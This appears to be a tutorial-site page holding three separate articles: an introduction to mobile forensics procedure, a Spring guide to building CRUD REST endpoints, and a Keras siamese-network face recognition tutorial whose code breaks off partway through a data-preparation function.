
How-To Tutorials


Introduction to Mobile Forensics

Packt
10 Jul 2014
18 min read
In 2013, there were almost as many mobile cellular subscriptions as there were people on Earth, according to the International Telecommunication Union (ITU). The following figure shows global mobile cellular subscriptions from 2005 to 2013. Mobile cellular subscriptions are growing at lightning speed and passed a whopping 7 billion early in 2014. Portio Research Ltd. predicts that mobile subscribers will reach 7.5 billion by the end of 2014 and 8.5 billion by the end of 2016.

Mobile cellular subscription growth from 2005 to 2013

Today's smartphones, such as the Apple iPhone, Samsung Galaxy series, and BlackBerry phones, are compact computers with high performance, huge storage, and enhanced functionality. Mobile phones are the most personal electronic devices users access. They are used to perform simple communication tasks, such as calling and texting, while also supporting Internet browsing, e-mail, taking photos and videos, creating and storing documents, identifying locations with GPS services, and managing business tasks. As new features and applications are incorporated into mobile phones, the amount of information stored on the devices continuously grows. Mobile phones have become portable data carriers, and they keep track of all your moves. With the increasing prevalence of mobile phones in people's daily lives and in crime, data acquired from phones becomes an invaluable source of evidence for investigations relating to criminal, civil, and even high-profile cases. It is rare to conduct a digital forensic investigation that does not include a phone. Mobile device call logs and GPS data were used to help solve the attempted bombing in Times Square, New York, in 2010. The details of the case can be found at http://www.forensicon.com/forensics-blotter/cell-phone-email-forensics-investigation-cracks-nyc-times-square-car-bombing-case/.

The science behind recovering digital evidence from mobile phones is called mobile forensics. Digital evidence is defined as information and data that is stored on, received, or transmitted by an electronic device and that is used for investigations. It encompasses any and all digital data that can be used as evidence in a case.

Mobile forensics

Digital forensics is a branch of forensic science focusing on the recovery and investigation of raw data residing in electronic or digital devices. Mobile forensics is the branch of digital forensics concerned with the recovery of digital evidence from mobile devices.

Forensically sound is a term used extensively in the digital forensics community to qualify and justify the use of a particular forensic technology or methodology. The main principle of a sound forensic examination of digital evidence is that the original evidence must not be modified. This is extremely difficult with mobile devices. Some forensic tools require a communication vector with the mobile device, so standard write protection will not work during forensic acquisition. Other forensic acquisition methods may involve removing a chip or installing a bootloader on the mobile device prior to extracting data for forensic examination. In cases where examination or data acquisition is not possible without changing the configuration of the device, the procedure and the changes must be tested, validated, and documented. Following proper methodology and guidelines is crucial when examining mobile devices, as it yields the most valuable data.
As with any evidence gathering, not following the proper procedure during the examination can result in the loss or damage of evidence or render it inadmissible in court. The mobile forensics process is broken into three main categories: seizure, acquisition, and examination/analysis.

Forensic examiners face several challenges while seizing a mobile device as a source of evidence. At the crime scene, if the mobile device is found switched off, the examiner should place the device in a faraday bag to prevent changes should the device automatically power on. Faraday bags are specifically designed to isolate the phone from the network. If the phone is found switched on, switching it off raises a number of concerns. If the phone is locked by a PIN or password, or is encrypted, the examiner will be required to bypass the lock or determine the PIN to access the device. Mobile phones are networked devices and can send and receive data through different sources, such as telecommunication systems, Wi-Fi access points, and Bluetooth. So, if the phone is in a running state, a criminal can securely erase the data stored on it by executing a remote wipe command. When a phone is found switched on, it should be placed in a faraday bag. If possible, before placing the mobile device in the faraday bag, disconnect it from the network by enabling flight mode and disabling all network connections (Wi-Fi, GPS, hotspots, and so on). This also preserves the battery, which would otherwise drain while in a faraday bag, and protects against any leaks in the bag.

Once the mobile device is seized properly, the examiner may need several forensic tools to acquire and analyze the data stored on the phone. Mobile device forensic acquisition can be performed using multiple methods, which are defined later. Each of these methods affects the amount of analysis required. Should one method fail, another must be attempted. Multiple attempts and tools may be necessary in order to acquire the most data from the mobile device.

Mobile phones are dynamic systems that present many challenges to the examiner in extracting and analyzing digital evidence. The rapid increase in the number of different kinds of mobile phones from different manufacturers makes it difficult to develop a single process or tool to examine all types of devices. Mobile phones are continuously evolving as existing technologies progress and new technologies are introduced. Furthermore, each mobile is designed with a variety of embedded operating systems. Hence, special knowledge and skills are required from forensic experts to acquire and analyze the devices.

Mobile forensic challenges

One of the biggest forensic challenges when it comes to the mobile platform is the fact that data can be accessed, stored, and synchronized across multiple devices. As the data is volatile and can be quickly transformed or deleted remotely, more effort is required for the preservation of this data. Mobile forensics is different from computer forensics and presents unique challenges to forensic examiners. Law enforcement and forensic examiners often struggle to obtain digital evidence from mobile devices, for some of the following reasons:

Hardware differences: The market is flooded with different models of mobile phones from different manufacturers. Forensic examiners may come across many mobile models, which differ in size, hardware, features, and operating system. Also, with a short product development cycle, new models emerge very frequently. As the mobile landscape changes with each passing day, it is critical for the examiner to adapt to all the challenges and remain up to date on mobile device forensic techniques.

Mobile operating systems: Unlike personal computers, where Windows has dominated the market for years, mobile devices widely use a range of operating systems, including Apple's iOS, Google's Android, RIM's BlackBerry OS, Microsoft's Windows Mobile, HP's webOS, Nokia's Symbian OS, and many others.

Mobile platform security features: Modern mobile platforms contain built-in security features to protect user data and privacy. These features act as a hurdle during forensic acquisition and examination. For example, modern mobile devices come with default encryption mechanisms from the hardware layer to the software layer. The examiner might need to break through these encryption mechanisms to extract data from the devices.

Lack of resources: As mentioned earlier, with the growing number of mobile phones, the tools required by a forensic examiner also increase. Forensic acquisition accessories, such as USB cables, batteries, and chargers for different mobile phones, have to be maintained in order to acquire those devices.

Generic state of the device: Even if a device appears to be in an off state, background processes may still run. For example, in most mobiles, the alarm clock still works even when the phone is switched off. A sudden transition from one state to another may result in the loss or modification of data.

Anti-forensic techniques: Anti-forensic techniques, such as data hiding, data obfuscation, data forgery, and secure wiping, make investigations on digital media more difficult.

Dynamic nature of evidence: Digital evidence may be easily altered either intentionally or unintentionally. For example, browsing an application on the phone might alter the data stored by that application on the device.

Accidental reset: Mobile phones provide features to reset everything. Resetting the device accidentally while examining it may result in the loss of data.

Device alteration: The possible ways to alter devices range from moving application data and renaming files to modifying the manufacturer's operating system. In this case, the expertise of the suspect should be taken into account.

Passcode recovery: If the device is protected with a passcode, the forensic examiner needs to gain access to the device without damaging the data on it.

Communication shielding: Mobile devices communicate over cellular networks, Wi-Fi networks, Bluetooth, and infrared. As device communication might alter the device data, the possibility of further communication should be eliminated after seizing the device.

Lack of availability of tools: There is a wide range of mobile devices. A single tool may not support all devices or perform all the necessary functions, so a combination of tools needs to be used. Choosing the right tool for a particular phone can be difficult.

Malicious programs: The device might contain malicious software, or malware, such as a virus or a Trojan. Such malicious programs may attempt to spread to other devices over either a wired or a wireless interface.

Legal issues: Mobile devices might be involved in crimes that cross geographical boundaries. In order to tackle these multijurisdictional issues, the forensic examiner should be aware of the nature of the crime and the regional laws.
Mobile phone evidence extraction process

Evidence extraction and forensic examination of each mobile device may differ. However, following a consistent examination process helps the forensic examiner ensure that the evidence extracted from each phone is well documented and that the results are repeatable and defendable. There is no well-established standard process for mobile forensics; however, the following figure provides an overview of process considerations for the extraction of evidence from mobile devices. All methods used when extracting data from mobile devices should be tested, validated, and well documented. A great resource for handling and processing mobile devices can be found at http://digital-forensics.sans.org/media/mobile-device-forensic-process-v3.pdf.

Mobile phone evidence extraction process

The evidence intake phase

The evidence intake phase is the starting phase. It entails request forms and paperwork to document ownership information and the type of incident the mobile device was involved in, and it outlines the type of data or information the requester is seeking. Developing specific objectives for each examination is the critical part of this phase, as it serves to clarify the examiner's goals.

The identification phase

The forensic examiner should identify the following details for every examination of a mobile device:

The legal authority
The goals of the examination
The make, model, and identifying information for the device
Removable and external data storage
Other sources of potential evidence

We will discuss each of them in the following sections.

The legal authority

It is important for the forensic examiner to determine and document what legal authority exists for the acquisition and examination of the device, as well as any limitations placed on the media prior to the examination of the device.

The goals of the examination

The examiner identifies how in-depth the examination needs to be based on the data requested. The goal of the examination makes a significant difference in selecting the tools and techniques to examine the phone and increases the efficiency of the examination process.

The make, model, and identifying information for the device

As part of the examination, identifying the make and model of the phone assists in determining which tools will work with it.

Removable and external data storage

Many mobile phones provide an option to extend the memory with removable storage devices, such as the TransFlash micro SD memory expansion card. When such a card is found in a mobile phone that is submitted for examination, the card should be removed and processed using traditional digital forensic techniques. It is wise to also acquire the card while it is in the mobile device, to ensure that data stored on both the handset memory and the card is linked for easier analysis.

Other sources of potential evidence

Mobile phones act as good sources of fingerprint and other biological evidence. Such evidence should be collected prior to the examination of the mobile phone to avoid contamination issues, unless the collection method would damage the device. Examiners should wear gloves when handling the evidence.

The preparation phase

Once the mobile phone model is identified, the preparation phase involves research regarding the particular mobile phone to be examined and the appropriate methods and tools to be used for acquisition and examination.
The isolation phase

Mobile phones are by design intended to communicate via cellular networks, Bluetooth, infrared, and wireless (Wi-Fi) networks. When the phone is connected to a network, new data is added to the phone through incoming calls, messages, and application data, which modifies the evidence on the phone. Complete destruction of data is also possible through remote access or remote wiping commands. For this reason, isolation of the device from communication sources is important prior to the acquisition and examination of the device. Isolation of the phone can be accomplished through the use of faraday bags, which block radio signals to or from the phone. Past research has found inconsistencies in the total communication protection provided by faraday bags, so additional network isolation is advisable. This can be done by placing the phone in radio-frequency shielding cloth and then putting the phone into airplane or flight mode.

The processing phase

Once the phone has been isolated from communication networks, the actual processing of the mobile phone begins. The phone should be acquired using a tested method that is repeatable and as forensically sound as possible. Physical acquisition is the preferred method, as it extracts the raw memory data and the device is commonly powered off during the acquisition process. On most devices, the fewest changes occur to the device during physical acquisition. If physical acquisition is not possible or fails, an attempt should be made to acquire the file system of the mobile device. A logical acquisition should always be obtained as well; although it may contain only parsed data, it can provide pointers for examining the raw memory image.

The verification phase

After processing the phone, the examiner needs to verify the accuracy of the data extracted from the phone to ensure that it has not been modified. The verification of the extracted data can be accomplished in several ways.

Comparing extracted data to the handset data

Check whether the data extracted from the device matches the data displayed by the device. The data extracted can be compared to the device itself or to a logical report, whichever is preferred. Remember, handling the original device may make changes to the only evidence, the device itself.

Using multiple tools and comparing the results

To ensure accuracy, use multiple tools to extract the data and compare the results.

Using hash values

All image files should be hashed after acquisition to ensure the data remains unchanged. If file system extraction is supported, the examiner extracts the file system and then computes hashes for the extracted files. Later, the hash of any individually extracted file is calculated and checked against the original value to verify its integrity. Any discrepancy in a hash value must be explainable (for example, the device was powered on and then acquired again, so the hash values differ).

The document and reporting phase

The forensic examiner is required to document the examination process throughout, in the form of contemporaneous notes relating to what was done during the acquisition and examination. Once the examiner completes the investigation, the results must go through some form of peer review to ensure the data is checked and the investigation is complete.
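Before turning to the details of that documentation, note that the hash check described under the verification phase is straightforward to script. The following is a minimal illustrative sketch in Python (not part of the original text; the image file name is a placeholder) showing how an acquisition image can be hashed at acquisition time and re-hashed later to confirm it has not changed:

```python
import hashlib

def sha256_of(path, chunk_size=1024 * 1024):
    """Compute the SHA-256 digest of a file, reading it in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

# Hash the image immediately after acquisition and record the value in the notes.
acquisition_hash = sha256_of("acquired_image.dd")

# Later, re-hash the same image (or an individually extracted file) and compare.
verification_hash = sha256_of("acquired_image.dd")

if acquisition_hash == verification_hash:
    print("Integrity verified: hash values match.")
else:
    print("Hash mismatch: the discrepancy must be investigated and explained.")
```

In practice, the acquisition-time hash is recorded in the examiner's notes so that any later verification can be checked against it.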
The examiner's notes and documentation may include information such as the following:

Examination start date and time
The physical condition of the phone
Photos of the phone and individual components
Phone status when received (turned on or off)
Phone make and model
Tools used for the acquisition
Tools used for the examination
Data found during the examination
Notes from peer review

The presentation phase

Throughout the investigation, it is important to make sure that the information extracted and documented from a mobile device can be clearly presented to any other examiner or to a court. Creating a forensic report of the data extracted from the mobile device during acquisition and analysis is important. This may include data in both paper and electronic formats. Your findings must be documented and presented in such a manner that the evidence speaks for itself in court. The findings should be clear, concise, and repeatable. Timeline and link analysis, features offered by many commercial mobile forensics tools, will aid in reporting and explaining findings across multiple mobile devices. These tools allow the examiner to tie together the methods behind the communication of multiple devices.

The archiving phase

Preserving the data extracted from the mobile phone is an important part of the overall process. It is also important that the data is retained in a usable format for the ongoing court process, for future reference should the current evidence file become corrupt, and for record-keeping requirements. Court cases may continue for many years before a final judgment is reached, and most jurisdictions require that data be retained for long periods for the purposes of appeals. As the field and its methods advance, new techniques for pulling data out of a raw, physical image may surface, and the examiner can then revisit the data by pulling a copy from the archives.

Practical mobile forensic approaches

Similar to any forensic investigation, there are several approaches that can be used for the acquisition and examination/analysis of data from mobile phones. The type of mobile device, the operating system, and the security settings generally dictate the procedure to be followed in a forensic process. Every investigation is distinct, with its own circumstances, so it is not possible to design a single definitive procedural approach for all cases. The following sections outline the general approaches used to extract data from mobile devices.

Mobile operating systems overview

One of the major factors in the data acquisition and examination/analysis of a mobile phone is the operating system. From low-end mobile phones to smartphones, mobile operating systems have come a long way, with a lot of features. The operating system directly affects how the examiner can access the mobile device. For example, Android OS gives terminal-level access, whereas iOS does not give such an option. A comprehensive understanding of the mobile platform helps the forensic examiner make sound forensic decisions and conduct a conclusive investigation. While there is a large range of smart mobile devices, four main operating systems dominate the market, namely Google Android, Apple iOS, RIM BlackBerry OS, and Windows Phone. More information can be found at http://www.idc.com/getdoc.jsp?containerId=prUS23946013.

Android

Android is a Linux-based operating system and Google's open source platform for mobile phones. It is the world's most widely used smartphone operating system; sources show that Apple's iOS is a close second (http://www.forbes.com/sites/tonybradley/2013/11/15/android-dominates-market-share-but-apple-makes-all-the-money/). Android has been developed by Google as an open and free option for hardware manufacturers and phone carriers. This makes Android the software of choice for companies that require a low-cost, customizable, lightweight operating system for their smart devices without developing a new OS from scratch. Android's open nature has further encouraged developers to build a large number of applications and upload them to Android Market. End users can then download these applications from Android Market, which makes Android a powerful operating system.

iOS

iOS, formerly known as the iPhone operating system, is a mobile operating system developed and distributed solely by Apple Inc. iOS is evolving into a universal operating system for all Apple mobile devices, such as the iPad, iPod touch, and iPhone. iOS is derived from OS X, with which it shares the Darwin foundation, and is therefore a Unix-like operating system. iOS manages the device hardware and provides the technologies required to implement native applications. It also ships with various system applications, such as Mail and Safari, which provide standard system services to the user. iOS native applications are distributed through the App Store, which is closely monitored by Apple.

Windows Phone

Windows Phone is a proprietary mobile operating system developed by Microsoft for smartphones and pocket PCs. It is the successor to Windows Mobile and is primarily aimed at the consumer market rather than the enterprise market. The Windows Phone OS is similar to the Windows desktop OS, but it is optimized for devices with a small amount of storage.

BlackBerry OS

BlackBerry OS is a proprietary mobile operating system developed by BlackBerry Ltd. (formerly known as Research In Motion, or RIM) exclusively for its BlackBerry line of smartphones and mobile devices. BlackBerry devices are widely used in corporate environments and offer native support for corporate mail via MIDP, which enables wireless synchronization with Microsoft Exchange e-mail, contacts, calendar, and so on, when used along with BlackBerry Enterprise Server. These devices are known for their security.


CRUD Operations in REST

Packt
16 Sep 2015
11 min read
In this article by Ludovic Dewailly, the author of Building a RESTful Web Service with Spring, we will learn how requests to retrieve data from a RESTful endpoint, created to access the rooms in a sample property management system, are typically mapped to the HTTP GET method in RESTful web services. We will expand on this by implementing some of the endpoints to support all the CRUD (Create, Read, Update, Delete) operations. In this article, we will cover the following topics:

Mapping the CRUD operations to the HTTP methods
Creating resources
Updating resources
Deleting resources
Testing the RESTful operations
Emulating the PUT and DELETE methods

Mapping the CRUD operations to HTTP methods

The HTTP 1.1 specification defines the following methods:

OPTIONS: This method represents a request for information about the communication options available for the requested URI. It is typically not directly leveraged with REST; however, it can be used as part of the underlying communication. For example, this method may be used when consuming web services from a web page (as part of the cross-origin resource sharing mechanism).

GET: This method retrieves the information identified by the request URI. In the context of RESTful web services, this method is used to retrieve resources. This is the method used for read operations (the R in CRUD).

HEAD: HEAD requests are semantically identical to GET requests, except that the body of the response is not transmitted. This method is useful for obtaining meta-information about resources. Like the OPTIONS method, it is not typically used directly in REST web services.

POST: This method is used to instruct the server to accept the entity enclosed in the request as a new resource. Create operations are typically mapped to this HTTP method.

PUT: This method requests that the server store the enclosed entity under the request URI. It can be leveraged to support the updating of REST resources. As per the HTTP specification, the server can create the resource if the entity does not exist. It is up to the web service designer to decide whether this behavior should be implemented or whether resource creation should only be handled by POST requests.

DELETE: The last operation not yet mapped is the deletion of resources. The HTTP specification defines a DELETE method that is semantically aligned with the deletion of RESTful resources.

TRACE: This method is used to perform actions on web servers. These actions are often aimed at aiding the development and testing of HTTP applications. TRACE requests aren't usually mapped to any particular RESTful operation.

CONNECT: This HTTP method is defined to support HTTP tunneling through a proxy server. Since it deals with transport-layer concerns, it has no natural semantic mapping to RESTful operations.

The RESTful architecture does not mandate the use of HTTP as a communication protocol. Furthermore, even if HTTP is selected as the underlying transport, no provisions are made regarding the mapping of RESTful operations to HTTP methods. Developers could feasibly support all operations through POST requests. That being said, the following CRUD-to-HTTP-method mapping is commonly used in REST web services:

Create: POST
Read: GET
Update: PUT
Delete: DELETE

Our sample web service will use these HTTP methods to support CRUD operations.
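To make the mapping concrete from a consumer's point of view, here is a minimal sketch (not part of the original article) using Python's requests library. It assumes the sample service described in this article is running locally at http://localhost:8080 and exposes the /rooms endpoints discussed below:

```python
import requests

BASE_URL = "http://localhost:8080/rooms"  # assumed location of the sample service

# Create (POST): send the new room as a JSON body
new_room = {
    "name": "Cool Room",
    "description": "A room that is very cool indeed",
    "room_category_id": 1,
}
created = requests.post(BASE_URL, json=new_room).json()
room_id = created["data"]["id"]

# Read (GET): fetch the room we just created
room = requests.get(f"{BASE_URL}/{room_id}").json()

# Update (PUT): change the description of the room
updated_room = dict(new_room, id=room_id,
                    description="A room that is really very cool indeed")
requests.put(f"{BASE_URL}/{room_id}", json=updated_room)

# Delete (DELETE): remove the room again
requests.delete(f"{BASE_URL}/{room_id}")
```

Each call corresponds to one row of the mapping above.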
The rest of this article will illustrate how to build such operations.

Creating resources

The inventory component of our sample property management system deals with rooms, and we have already built an endpoint to access them. Let's take a look at how to define an endpoint to create new resources:

```java
@RestController
@RequestMapping("/rooms")
public class RoomsResource {

    @RequestMapping(method = RequestMethod.POST)
    public ApiResponse addRoom(@RequestBody RoomDTO room) {
        Room newRoom = createRoom(room);
        return new ApiResponse(Status.OK, new RoomDTO(newRoom));
    }
}
```

We've added a new method to our RoomsResource class to handle the creation of new rooms. @RequestMapping is used to map requests to the Java method; here, we map POST requests to addRoom(). Not specifying a value (that is, a path) in @RequestMapping is equivalent to using "/". We pass the new room as @RequestBody. This annotation instructs Spring to map the body of the incoming web request to the method parameter. Jackson is used here to convert the JSON request body to a Java object. With this new method, POSTing a request to http://localhost:8080/rooms with the following JSON body will result in the creation of a new room:

```json
{
  "name": "Cool Room",
  "description": "A room that is very cool indeed",
  "room_category_id": 1
}
```

Our new method will return the newly created room:

```json
{
  "status": "OK",
  "data": {
    "id": 2,
    "name": "Cool Room",
    "room_category_id": 1,
    "description": "A room that is very cool indeed"
  }
}
```

We can decide to return only the ID of the new resource in response to the resource creation. However, since we may sanitize or otherwise manipulate the data that was sent over, it is good practice to return the full resource.

Quickly testing endpoints

For the purpose of quickly testing our newly created endpoint, let's look at testing the new rooms created using Postman. Postman (https://www.getpostman.com) is a Google Chrome extension that provides tools to build and test web APIs. The following screenshot illustrates how Postman can be used to test this endpoint:

In Postman, we specify the URL to send the POST request to, http://localhost:8080/rooms, with the application/json content type header and the body of the request. Sending this request will result in a new room being created and returned, as shown in the following:

We have successfully added a room to our inventory service using Postman. It is equally easy to create incomplete requests to ensure our endpoint performs any necessary sanity checks before persisting data into the database.

JSON versus form data

Posting forms is the traditional way of creating new entities on the web and could easily be used to create new RESTful resources. We can change our method to the following:

```java
@RequestMapping(method = RequestMethod.POST,
                consumes = MediaType.APPLICATION_FORM_URLENCODED_VALUE)
public ApiResponse addRoom(String name, String description, long roomCategoryId) {
    Room room = createRoom(name, description, roomCategoryId);
    return new ApiResponse(Status.OK, new RoomDTO(room));
}
```

The main difference from the previous method is that we tell Spring to map form requests (that is, requests with the application/x-www-form-urlencoded content type) instead of JSON requests. In addition, rather than expecting an object as a parameter, we receive each field individually. By default, Spring will use the Java method attribute names to map incoming form inputs. Developers can change this behavior by annotating an attribute with @RequestParam("…") to specify the input name.
In situations where the main web service consumer is a web application, using form requests may be more applicable. In most cases, however, the former approach is more in line with RESTful principles and should be favored. Besides, when complex resources are handled, form requests prove cumbersome to use. From a developer's standpoint, it is easier to delegate object mapping to a third-party library such as Jackson. Now that we have created a new resource, let's see how we can update it.

Updating resources

Choosing URI formats is an important part of designing RESTful APIs. As seen previously, rooms are accessed using the /rooms/{roomId} path and created under /rooms. You may recall that, as per the HTTP specification, PUT requests can result in the creation of entities if they do not exist. The decision to create new resources on update requests is up to the service designer. It does, however, affect the choice of path to be used for such requests. Semantically, PUT requests update entities stored under the supplied request URI. This means that update requests should use the same URI as the GET requests: /rooms/{roomId}. However, this approach hinders the ability to support resource creation on update, since no room identifier will be available. The alternative path we can use is /rooms, with the room identifier passed in the body of the request. With this approach, PUT requests can be treated as POST requests when the resource does not contain an identifier. Given that the first approach is semantically more accurate, we will choose not to support resource creation on update, and we will use the following path for PUT requests: /rooms/{roomId}

Update endpoint

The following method provides the necessary endpoint to modify rooms:

```java
@RequestMapping(value = "/{roomId}", method = RequestMethod.PUT)
public ApiResponse updateRoom(@PathVariable long roomId, @RequestBody RoomDTO updatedRoom) {
    try {
        Room room = updateRoom(updatedRoom);
        return new ApiResponse(Status.OK, new RoomDTO(room));
    } catch (RecordNotFoundException e) {
        return new ApiResponse(Status.ERROR, null,
                new ApiError(999, "No room with ID " + roomId));
    }
}
```

As discussed at the beginning of this article, we map update requests to the HTTP PUT verb. Annotating this method with @RequestMapping(value = "/{roomId}", method = RequestMethod.PUT) instructs Spring to direct PUT requests here. The room identifier is part of the path and is mapped to the first method parameter. In a fashion similar to the resource creation requests, we map the body to our second parameter with @RequestBody.

Testing update requests

With Postman, we can quickly create a test case to update the room we created. To do so, we send a PUT request with the following body:

```json
{
  "id": 2,
  "name": "Cool Room",
  "description": "A room that is really very cool indeed",
  "room_category_id": 1
}
```

The resulting response will be the updated room, as shown here:

```json
{
  "status": "OK",
  "data": {
    "id": 2,
    "name": "Cool Room",
    "room_category_id": 1,
    "description": "A room that is really very cool indeed."
  }
}
```

Should we attempt to update a nonexistent room, the server will generate the following response:

```json
{
  "status": "ERROR",
  "error": {
    "error_code": 999,
    "description": "No room with ID 3"
  }
}
```

Since we do not support resource creation on update, the server returns an error indicating that the resource cannot be found.

Deleting resources

It will come as no surprise that we will use the DELETE verb to delete REST resources.
Similarly, the reader will have already figured out that the path for delete requests will be /rooms/{roomId}. The Java method that deals with room deletion is as follows:

```java
@RequestMapping(value = "/{roomId}", method = RequestMethod.DELETE)
public ApiResponse deleteRoom(@PathVariable long roomId) {
    try {
        Room room = inventoryService.getRoom(roomId);
        inventoryService.deleteRoom(room.getId());
        return new ApiResponse(Status.OK, null);
    } catch (RecordNotFoundException e) {
        return new ApiResponse(Status.ERROR, null,
                new ApiError(999, "No room with ID " + roomId));
    }
}
```

By declaring the request mapping method to be RequestMethod.DELETE, Spring will make this method handle DELETE requests. Since the resource is deleted, returning it in the response would not make a lot of sense. Service designers may choose to return a boolean flag to indicate that the resource was successfully deleted. In our case, we leverage the status element of our response to carry this information back to the consumer. The response to deleting a room will be as follows:

```json
{
  "status": "OK"
}
```

With this operation, we now have a full-fledged CRUD API for our inventory service. Before we conclude this article, let's discuss how REST developers can deal with situations where not all HTTP verbs can be utilized.

HTTP method override

In certain situations (for example, when the service or its consumers are behind an overzealous corporate firewall, or when the main consumer is a web page), only the GET and POST HTTP methods might be available. In such cases, it is possible to emulate the missing verbs by passing a custom header in the requests. For example, resource updates can be handled using POST requests by setting a custom header (for example, X-HTTP-Method-Override) to PUT to indicate that we are emulating a PUT request via a POST request. The following method will handle this scenario:

```java
@RequestMapping(value = "/{roomId}", method = RequestMethod.POST,
                headers = {"X-HTTP-Method-Override=PUT"})
public ApiResponse updateRoomAsPost(@PathVariable("roomId") long id, @RequestBody RoomDTO updatedRoom) {
    return updateRoom(id, updatedRoom);
}
```

By setting the headers attribute on the mapping annotation, Spring request routing will intercept POST requests carrying our custom header and invoke this method. Normal POST requests will still map to the Java method we put together to create new rooms.

Summary

In this article, we've completed the implementation of our sample RESTful web service by adding all the CRUD operations necessary to manage room resources. We've discussed how to organize URIs to best embody REST principles and looked at how to quickly test endpoints using Postman. Now that we have a fully working component of our system, we can take some time to discuss performance.

Resources for Article:

Further resources on this subject:
Introduction to Spring Web Application in No Time [article]
Aggregators, File exchange Over FTP/FTPS, Social Integration, and Enterprise Messaging [article]
Time Travelling with Spring [article]


Face recognition using siamese networks [Tutorial]

Prasad Ramesh
25 Feb 2019
11 min read
A siamese network is a special type of neural network and it is one of the simplest and most popularly used one-shot learning algorithms. One-shot learning is a technique where we learn from only one training example per class. So, a siamese network is predominantly used in applications where we don't have many data points in each class. For instance, let's say we want to build a face recognition model for our organization and about 500 people are working in our organization. If we want to build our face recognition model using a Convolutional Neural Network (CNN) from scratch, then we need many images of all of these 500 people for training the network and attaining good accuracy. But apparently, we will not have many images for all of these 500 people and so it is not feasible to build a model using a CNN or any deep learning algorithm unless we have sufficient data points. So, in these kinds of scenarios, we can resort to a sophisticated one-shot learning algorithm such as a siamese network, which can learn from fewer data points.

Siamese networks basically consist of two symmetrical neural networks, both sharing the same weights and architecture and both joined together at the end using some energy function, E. The objective of our siamese network is to learn whether two input values are similar or dissimilar. We will understand the siamese network by building a face recognition model. The objective of our network is to understand whether two faces are similar or dissimilar. We use the AT&T Database of Faces, which can be downloaded from the Cambridge University Computer Laboratory website.

This article is an excerpt from a book written by Sudharsan Ravichandiran titled Hands-On Meta-Learning with Python. In this book, you will learn how to build relation networks and matching networks from scratch.

Once you have downloaded and extracted the archive, you can see the folders s1, s2, up to s40, as shown here:

Each of these folders has 10 different images of a single person taken from various angles. For instance, let's open folder s1. As you can see, there are 10 different images of a single person:

We open and check folder s13:

Siamese networks require input values as a pair along with the label, so we have to create our data in such a way. So, we will take two images randomly from the same folder and mark them as a genuine pair, and we will take single images from two different folders and mark them as an imposite pair. A sample is shown in the following screenshot; as you can see, a genuine pair has images of the same person and the imposite pair has images of different people:

Once we have our data as pairs along with their labels, we train our siamese network. From the image pair, we feed one image to network A and another image to network B. The role of these two networks is only to extract the feature vectors. So, we use two convolution layers with rectified linear unit (ReLU) activations for extracting the features. Once we have learned the features, we feed the resultant feature vector from both of the networks to the energy function, which measures the similarity; we use Euclidean distance as our energy function. So, we train our network by feeding the image pair to learn the semantic similarity between them. Now, we will see this step by step. For better understanding, you can check the complete code, which is available as a Jupyter Notebook with an explanation on GitHub.
First, we will import the required libraries:

```python
import re
import numpy as np
from PIL import Image

from sklearn.model_selection import train_test_split

from keras import backend as K
from keras.layers import Activation
from keras.layers import Input, Lambda, Dense, Dropout, Convolution2D, MaxPooling2D, Flatten
from keras.models import Sequential, Model
from keras.optimizers import RMSprop
```

Now, we define a function for reading our input images. The read_image function takes an image file as input and returns a NumPy array:

```python
def read_image(filename, byteorder='>'):

    #first we read the image, as a raw file to the buffer
    with open(filename, 'rb') as f:
        buffer = f.read()

    #using regex, we extract the header, width, height and maxval of the image
    header, width, height, maxval = re.search(
        b"(^P5\s(?:\s*#.*[\r\n])*"
        b"(\d+)\s(?:\s*#.*[\r\n])*"
        b"(\d+)\s(?:\s*#.*[\r\n])*"
        b"(\d+)\s(?:\s*#.*[\r\n]\s)*)", buffer).groups()

    #then we convert the image to a numpy array using np.frombuffer, which interprets the buffer as a one-dimensional array
    return np.frombuffer(buffer,
                         dtype='u1' if int(maxval) < 256 else byteorder+'u2',
                         count=int(width)*int(height),
                         offset=len(header)
                         ).reshape((int(height), int(width)))
```

For example, let's open one image:

```python
Image.open("data/orl_faces/s1/1.pgm")
```

When we feed this image to our read_image function, it will be returned as a NumPy array:

```python
img = read_image('data/orl_faces/s1/1.pgm')
img.shape
(112, 92)
```

Now, we define another function, get_data, for generating our data. As we know, for the siamese network, data should be in the form of pairs (genuine and imposite) with a binary label. First, we read the (img1, img2) images from the same directory, store them in the x_genuine_pair array, and assign y_genuine to 1. Next, we read the (img1, img2) images from different directories, store them in the x_imposite pair, and assign y_imposite to 0. Finally, we concatenate both x_genuine_pair and x_imposite to X, and y_genuine and y_imposite to Y:

```python
size = 2
total_sample_size = 10000

def get_data(size, total_sample_size):
    #read the image
    image = read_image('data/orl_faces/s' + str(1) + '/' + str(1) + '.pgm', 'rw+')
    #reduce the size
    image = image[::size, ::size]
    #get the new size
    dim1 = image.shape[0]
    dim2 = image.shape[1]

    count = 0

    #initialize the numpy array with the shape of [total_sample, no_of_pairs, dim1, dim2]
    x_geuine_pair = np.zeros([total_sample_size, 2, 1, dim1, dim2]) # 2 is for pairs
    y_genuine = np.zeros([total_sample_size, 1])

    for i in range(40):
        for j in range(int(total_sample_size/40)):
            ind1 = 0
            ind2 = 0

            #read images from same directory (genuine pair)
            while ind1 == ind2:
                ind1 = np.random.randint(10)
                ind2 = np.random.randint(10)

            # read the two images
            img1 = read_image('data/orl_faces/s' + str(i+1) + '/' + str(ind1 + 1) + '.pgm', 'rw+')
            img2 = read_image('data/orl_faces/s' + str(i+1) + '/' + str(ind2 + 1) + '.pgm', 'rw+')

            #reduce the size
            img1 = img1[::size, ::size]
            img2 = img2[::size, ::size]

            #store the images to the initialized numpy array
            x_geuine_pair[count, 0, 0, :, :] = img1
            x_geuine_pair[count, 1, 0, :, :] = img2

            #as we are drawing images from the same directory we assign label as 1. (genuine pair)
            y_genuine[count] = 1
            count += 1

    count = 0
    x_imposite_pair = np.zeros([total_sample_size, 2, 1, dim1, dim2])
    y_imposite = np.zeros([total_sample_size, 1])

    for i in range(int(total_sample_size/10)):
        for j in range(10):

            #read images from different directory (imposite pair)
            while True:
                ind1 = np.random.randint(40)
                ind2 = np.random.randint(40)
                if ind1 != ind2:
                    break

            img1 = read_image('data/orl_faces/s' + str(ind1+1) + '/' + str(j + 1) + '.pgm', 'rw+')
            img2 = read_image('data/orl_faces/s' + str(ind2+1) + '/' + str(j + 1) + '.pgm', 'rw+')

            img1 = img1[::size, ::size]
            img2 = img2[::size, ::size]

